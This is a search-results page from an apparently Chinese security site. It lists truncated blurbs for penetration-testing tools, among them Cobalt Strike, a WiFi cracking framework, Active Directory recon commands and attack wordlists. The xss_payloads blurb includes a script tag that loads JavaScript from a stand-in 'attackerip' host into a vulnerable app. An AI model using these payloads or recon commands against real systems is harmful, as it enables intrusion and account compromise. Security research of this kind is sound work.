搜索 “扫描”

tarnish Chrome扩展安全分析 tarnish是一种静态分析工具，可帮助研究人员评估Chrome扩展程序的安全性。它可以自动完成许多常规的繁琐工作，并帮助您快速识别潜在的安全漏洞。 以往检查Chrome扩展安全性都是手动查看源码查审计的，现在tarnish为我们提供了一个参考，让这项工作变得更简便高效。 Chrome扩展安全漏洞例子：Reddit Enh...

opencanary_web介绍 opencanary_web是一个Linux web蜜罐管理系统，基于Tornado+Vue+Mysql+APScheduler+Nginx+Supervisor。可收集相对全面的攻击信息，还具有很多管理功能，如白名单/邮件/过滤等。 可统计信息 ftp登录尝试；http访问请求；http登录请求；ssh建立连接；ssh远程版本发送；ssh登录尝试；telnet登录尝试；全端口(SYN)扫...

Ehtools介绍 Ehtools是一个非常强大的WIFI渗透工具框架，对于初学者来说越来越容易使用，它可以很容易地从内部进行探索。 这个强大而简单的工具可以用于任何事情，从安装新的附加组件到在几秒钟内抓取一个 WPA 握手包。 另外，它易于安装、设置和使用。 Ehtools WiFi渗透工具 Ehtools安装 $ git c...

本文介绍了域渗透中域内信息收集的常见命令与基础工具。 常用收集域信息命令 Net use Net view Tasklist /v Ipconfig /all net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admins” /domain 获得企业管理员列表 net localgroup adm...

AttackSurfaceMapper 渗透测试工具介绍 AttackSurfaceMapper（ASM）旨在通过将单个目标域或IPv4地址列表作为输入，然后使用被动OSINT技术和主动侦察方法对其进行分析，从而大大简化侦察过程。它是一个全新开发的渗透测试工具。它枚举具有强制和被动查找的子域，同一网络块所有者的其他IP，具有指向它们的多个域名的IP等等。 目标列表...

Cobalt Strike 渗透神器 CobatStrike是一款基于java编写的全平台多方协同后渗透测试攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、木马、远程控制等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。它是收费软件，特殊版本请在本站搜索CobaltStrike。 AggressorScripts 脚本 在Cobal...

GitMiner介绍 Github 中的自动化高级搜索工具。 这个工具的目的是通过搜索 github 上的代码或代码片段发现敏感信息泄露。证明公共存储库存储敏感信息代码的脆弱性。 GitMiner github信息泄露扫描工具 要求 lxmlrequestsargparsejsonre GitMiner安装 $ git clone http://github.com/UnkL4b/...

truegaze Android/IOS应用静态分析工具 一个针对 Android 和 iOS 应用程序的静态分析工具，专注于源代码之外的安全问题，如资源字符串、第三方库和配置文件等。 依赖 Python 3是必需的，您可以在 requirements.txt 文件中找到所有必需的模块。 只在 Python 3.7上测试过，但应该可以在其他3. x 版本上使用。 目前还没有支持2.x ...

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞：alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

SaiDict 渗透测试字典 该项目维护者收藏了弱口令，敏感目录，敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。 渗透测试字典项目 目前字典的目录大概分布如下： 账户字典 |-常用弱密码 |-常用账户名 |-中国人名拼音 |-常用手机号 fuzz字典 |-LDAP注入 |-SQ...